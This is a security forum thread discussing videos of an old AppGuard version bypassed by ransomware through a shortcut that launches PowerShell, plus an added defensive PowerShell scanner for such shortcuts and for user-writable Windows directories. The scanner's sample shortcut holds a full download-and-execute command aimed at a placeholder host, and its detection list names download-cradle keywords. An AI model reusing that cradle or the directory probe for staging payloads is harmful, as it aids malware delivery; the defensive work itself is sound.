App Review: AppGuard bypassed (old version)


Evjl's Rain

Hi everyone, I was searching the internet and I found these videos from F4zzx. Both videos show that AppGuard was bypassed/failed to protect his virtual PC against ransomware.

I have never tried AppGuard and I'm not the author so please don't hit me :)
Just comment what you think about the videos



 

Evjl's Rain

Because of the result from these videos, I think a signature-less configuration is quite risky and sometimes is not efficient against sophisticated malware or ransomware. It's better to have at least an AV, any of them, than signature-less solutions.
 

hjlbx

The video is a test of 4.3.1.3 - which has since been fixed. The current versions are 4.4.6.1 (AppGuard Professional) and 5.X.X.X (AppGuard Personal)

The malware uses a *.lnk file with an argument that points to Powershell. Powershell then downloads the ransomware from the net and writes it to c:\windows\temp and then executes it. I cannot recall, but I think a *.wsf file (wscript) is used as well. This video publisher posted two such scenarios - and I cannot remember the exact details of each - but both involved *.lnk files.

Malicious attacks using *.lnk files are not a common method, but I have seen it done.

BRN solved the issue in version 4.4 by adding Powershell to Guarded Apps and also blocking *.wsf files by default. Guarded Apps cannot write to c:\windows\temp. So an attack using Powershell as shown in the video is not possible with the current consumer versions.

* * * * *

I have submitted formal enhancements to have:

1. Powershell completely disabled by default in the consumer (non-Enterprise) versions of AppGuard
2. A generic protection against malicious *.lnk files with arguments; writable directories in System Space are to be treated the same as User Space

What 2 means is that a malicious *.lnk file with an argument can abuse a vulnerable Windows process not on the Guarded Apps list to download a malicious file, write it to any System Space directory that the OS allows, but AppGuard will block all executions from those directories.

This is the most effective way to do it without breaking anything...

Also, the way I have requested 2, it eliminates the need to add every vulnerable Windows process to the Guarded Apps list. Adding all vulnerable Windows processes can still be done - in order to mitigate an exploit attack - which is unrelated to the attack shown in the video - earlier in the run sequence - but there is no absolute need to do it.
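The chain hjlbx describes (a *.lnk whose argument launches Powershell, which downloads a payload into c:\windows\temp and runs it) and enhancement request 2 (treat user-writable directories in System Space like User Space) come down to two things a defender can check on a box. The PowerShell below is an added example written for this page; it is not hjlbx's, BRN's or AppGuard's code. It parses shortcuts through the WScript.Shell COM object (parsing never launches them), flags shortcuts whose target is a script host and whose arguments contain download-cradle markers, and probes which directories under $env:SystemRoot a standard user can actually create files in. The script-host list, the marker list, the scratch folder and the example.invalid URL in the constructed sample shortcut are assumptions; the sample is built, scanned and deleted, never executed.

```powershell
# Added example for this thread; not code from hjlbx, BRN or AppGuard.
# Two checks for the chain described above:
#   1. Find-SuspiciousShortcut   - parse *.lnk files and flag ones whose target is a
#      script host (powershell/wscript/cscript/cmd/mshta) with download-cradle arguments.
#   2. Get-UserWritableSystemDir - list directories under System Space that the current
#      user can write to, i.e. the staging locations enhancement request 2 is about.
# Run in a NON-elevated session so the writability probe reflects a standard user.
# Requires Windows PowerShell 5.x (Get-ChildItem -Depth) and the WScript.Shell COM object.

# Assumed lists; extend as needed. Matching is case-insensitive.
$ScriptHosts   = 'powershell.exe', 'powershell_ise.exe', 'pwsh.exe',
                 'wscript.exe', 'cscript.exe', 'cmd.exe', 'mshta.exe'
$CradleMarkers = 'DownloadString', 'DownloadFile', 'Net.WebClient', 'Invoke-WebRequest',
                 'iwr ', 'Start-BitsTransfer', 'bitsadmin', 'certutil', 'IEX',
                 'Invoke-Expression', '-enc', '-EncodedCommand', 'http'

function Find-SuspiciousShortcut {
    param([Parameter(Mandatory)][string[]]$Path)
    $shell = New-Object -ComObject WScript.Shell
    foreach ($dir in $Path) {
        Get-ChildItem -Path $dir -Filter *.lnk -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            # CreateShortcut only reads the .lnk; nothing is launched.
            $lnk       = $shell.CreateShortcut($_.FullName)
            $target    = [System.IO.Path]::GetFileName($lnk.TargetPath)
            $arguments = $lnk.Arguments
            if ($ScriptHosts -contains $target) {
                $hits    = @($CradleMarkers | Where-Object { $arguments -match [regex]::Escape($_) })
                $verdict = if ($hits.Count -gt 0) { 'download cradle' } else { 'script host target, review manually' }
                [pscustomobject]@{
                    Shortcut  = $_.FullName
                    Target    = $lnk.TargetPath
                    Arguments = $arguments
                    Markers   = ($hits -join ', ')
                    Verdict   = $verdict
                }
            }
        }
    }
}

function Get-UserWritableSystemDir {
    param([string]$Root = $env:SystemRoot, [int]$Depth = 2)
    Get-ChildItem -Path $Root -Directory -Recurse -Depth $Depth -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Creating a file is the ground truth for "writable", whatever the ACL says.
        $probe = Join-Path $_.FullName ('probe-{0}.tmp' -f [guid]::NewGuid())
        try {
            [System.IO.File]::WriteAllText($probe, '')
            $_.FullName
        } catch {
            # access denied: not user-writable
        } finally {
            # CREATOR OWNER normally gets delete rights; if not, the empty probe file is left behind.
            Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        }
    }
}

# --- constructed sample shortcut: built, scanned, deleted; never executed ---
$scratch = Join-Path $env:TEMP ('lnk-demo-{0}' -f [guid]::NewGuid())
New-Item -ItemType Directory -Path $scratch | Out-Null
$shell  = New-Object -ComObject WScript.Shell
$sample = $shell.CreateShortcut((Join-Path $scratch 'Invoice.lnk'))
$sample.TargetPath = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
# Hypothetical URL and drop path; only the argument shape matters for the scan.
$sample.Arguments  = '-w hidden -c "(New-Object Net.WebClient).DownloadFile(''http://example.invalid/x.exe'',''C:\Windows\Temp\x.exe''); Start-Process C:\Windows\Temp\x.exe"'
$sample.Save()

Find-SuspiciousShortcut -Path $scratch | Format-List
Remove-Item -LiteralPath $scratch -Recurse -Force

Get-UserWritableSystemDir | ForEach-Object { "user-writable in System Space: $_" }
```

For a real sweep, point Find-SuspiciousShortcut at the places shortcuts arrive (the Desktop, Downloads, and both Start Menu folders) rather than the scratch directory. The sample shortcut is reported as "download cradle" with DownloadFile, Net.WebClient and http as markers. The writability probe typically lists $env:SystemRoot\Temp and $env:SystemRoot\Tasks on a default install; every directory it prints is one where a downloader running as the user can stage a file, which is exactly why the request above asks for executions from those directories to be blocked rather than for every Windows process to be put on the Guarded Apps list.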
 

_CyberGhosT_

> Because of the result from these videos, I think a signature-less configuration is quite risky and sometimes is not efficient against sophisticated malware or ransomware. It's better to have at least an AV, any of them, than signature-less solutions.
Not very familiar with VoodooShield are ya? ;)
 

_CyberGhosT_

> The video is a test of 4.3.1.3 - which has since been fixed. The current versions are 4.4.6.1 (AppGuard Professional) and 5.X.X.X (AppGuard Personal)
>
> The malware uses a *.lnk file with an argument that points to Powershell. Powershell then downloads the ransomware from the net and writes it to c:\windows\temp and then executes it. I cannot recall, but I think a *.wsf file (wscript) is used as well. This video publisher posted two such scenarios - and I cannot remember the exact details of each - but both involved *.lnk files.
>
> Malicious attacks using *.lnk files are not a common method, but I have seen it done.
>
> BRN solved the issue in version 4.4 by adding Powershell to Guarded Apps and also blocking *.wsf files by default. Guarded Apps cannot write to c:\windows\temp. So an attack using Powershell as shown in the video is not possible with the current consumer versions.
>
> * * * * *
>
> I have submitted formal enhancements to have:
>
> 1. Powershell completely disabled by default in the consumer (non-Enterprise) versions of AppGuard
> 2. A generic protection against malicious *.lnk files with arguments; writable directories in System Space are to be treated the same as User Space
>
> What 2 means is that a malicious *.lnk file with an argument can abuse a vulnerable Windows process not on the Guarded Apps list to download a malicious file, write it to any System Space directory that the OS allows, but AppGuard will block all executions from those directories.
>
> This is the most effective way to do it without breaking anything...
>
> Also, the way I have requested 2, it eliminates the need to add every vulnerable Windows process to the Guarded Apps list. Adding all vulnerable Windows processes can still be done - in order to mitigate an exploit attack - which is unrelated to the attack shown in the video - earlier in the run sequence - but there is no absolute need to do it.
Thanks for this clear and concise explanation @hjlbx , I am getting very interested in AppGuard as of late.
 

Evjl's Rain

> Not very familiar with VoodooShield are ya? ;)
I was using VS for a few months then uninstalled it because of the annoying freezing bug, which became more frequent each time I updated to a newer version. I'm watching the Wilders thread and they still say it still freezes.
VS was great but nothing is perfect. Who knows if any script can bypass VS.
Your setup is almost impenetrable in real daily usage but on a happy day you allow something and it can bypass 3 of your apps, especially when you allow it by VS :D
 

_CyberGhosT_

> I was using VS for a few months then uninstalled it because of the annoying freezing bug, which became more frequent each time I updated to a newer version. I'm watching the Wilders thread and they still say it still freezes.
> VS was great but nothing is perfect. Who knows if any script can bypass VS.
> Your setup is almost impenetrable in real daily usage but on a happy day you allow something and it can bypass 3 of your apps, especially when you allow it by VS :D
Right, in the wrong hands any "user" can render a solid config useless. The freezing issue is sad, I have used VS from the closed beta (2 yrs now?) and never had any "freezing" after v3.4 I think. But I did read that Dan thinks it's solved, I guess some system configs just won't run it. It's the flagship in my defense but it's not the only card up my sleeve. I have this system locked down so tight with Process Lasso that it will take a very special malware author to get through here, even without VS. Keeping all your eggs in one basket is foolhardy, and momma didn't raise one of those :p
 

shmu26

> I was using VS for a few months then uninstalled it because of the annoying freezing bug, which became more frequent each time I updated to a newer version. I'm watching the Wilders thread and they still say it still freezes.
> VS was great but nothing is perfect. Who knows if any script can bypass VS.
> Your setup is almost impenetrable in real daily usage but on a happy day you allow something and it can bypass 3 of your apps, especially when you allow it by VS :D
I tested one of the latest builds of VS last week, and I found that when protection is active, it blocks execution of powershell and wscript.exe and cscript.exe. So that should provide a second layer of protection, even if the user mistakenly allowed a malicious file to execute.

I do agree with Evjl's Rain that there are some annoying bugs in VS that the dev has not succeeded in solving yet.
 

Evjl's Rain

> Right, in the wrong hands any "user" can render a solid config useless. The freezing issue is sad, I have used VS from the closed beta (2 yrs now?) and never had any "freezing" after v3.4 I think. But I did read that Dan thinks it's solved, I guess some system configs just won't run it. It's the flagship in my defense but it's not the only card up my sleeve. I have this system locked down so tight with Process Lasso that it will take a very special malware author to get through here, even without VS. Keeping all your eggs in one basket is foolhardy, and momma didn't raise one of those :p
VS only freezes when you put your PC into sleep mode for a while and then wake it up. It froze very frequently like this for me; sometimes it didn't freeze, otherwise it didn't freeze if my laptop was on the whole time.
 

hjlbx

> Because of the result from these videos, I think a signature-less configuration is quite risky and sometimes is not efficient against sophisticated malware or ransomware. It's better to have at least an AV, any of them, than signature-less solutions.

I can understand how you would think this, but if we both sat in front of a system with AppGuard installed and I explained and demonstrated how it functions -- I would bet in the end you'd think otherwise.
 

_CyberGhosT_

> VS only freezes when you put your PC into sleep mode for a while and then wake it up. It froze very frequently like this for me; sometimes it didn't freeze, otherwise it didn't freeze if my laptop was on the whole time.
Ahhh, that explains a lot, I have Process Lasso set to keep my PC awake "Indefinitely". If I'm going to be away for a long time I power it down. I may disable that option and see if it does sleep if I get freezing. Maybe it's not solved for me, just been avoided because of my Lasso setting, very interesting.
 

Evjl's Rain

> This may be a solution that would fix your issue as well. If you have Lasso, set it to keep your PC awake by right clicking on the tray icon and hovering over "Keep PC Awake"; Indefinitely is one of the options ;)
but this option will waste some power :D
I want my laptop to sleep

I will use VS again just in case I get 2-year giveaway license. Maybe VS freezes less frequently now
 

askmark

> but this option will waste some power :D
> I want my laptop to sleep
>
> I will use VS again just in case I get 2-year giveaway license. Maybe VS freezes less frequently now

I was getting fairly regular freezes (few times a week) on my laptop - sometimes after waking up, sometimes directly after logging in - but since 3.38 beta, I've not had a single freeze. Not sure if the problem is 100% resolved, but Dan (the author) is working tirelessly to eliminate the problem completely.
 

hjlbx

If VS freeze is connected to Sleep or Hibernation, then it is likely that it is a driver and/or hardware issue.

This would account for the fact that not every single VS user experiences the freeze; it appears to be system (driver/hardware) specific.

Has the developer requested post-freeze memory dumps from those users that experience it and made a comparison?

That being said, it is possible that there are several things that cause the VS freeze - as opposed to one specific thing.
 

askmark

> If VS freeze is connected to Sleep or Hibernation, then it is likely that it is a driver and/or hardware issue.
>
> This would account for the fact that not every single VS user experiences the freeze; it appears to be system (driver/hardware) specific.
>
> Has the developer requested post-freeze memory dumps from those users that experience it and made a comparison?
>
> That being said, it is possible that there are several things that cause the VS freeze - as opposed to one specific thing.

No memory dumps have been requested, although I have offered to send them. Dan has improved the freeze issue by identifying a memory leak, which occurred due to too many alerts appearing while the user was away and not being there to answer them. These alerts were causing VS to consume and not release a significant amount of heap memory. The memory problem has definitely been resolved as I've since measured VS's mem use using perfmon for a week and it never went above 100MB, despite forcing it to scan some really large files (some over 600MB).

What's left is a freeze issue that's not memory related. Personally, I think Dan needs to request system information from everyone who is experiencing the problem to see if they share a common hardware or software component.
 

shmu26

I think that people are not generally aware that SpyShelter functions as an anti-exe, and doesn't suffer from the bugs of VS. And it has multi-cloud look-up if you want a file rating.
You can install it without the intrusive keystroke hooks, as long as you are not super paranoid about keyloggers, and you can customize the trusted vendors and vulnerable processes to the level of sensitivity you want.
That's besides all the other system protections it does.
 
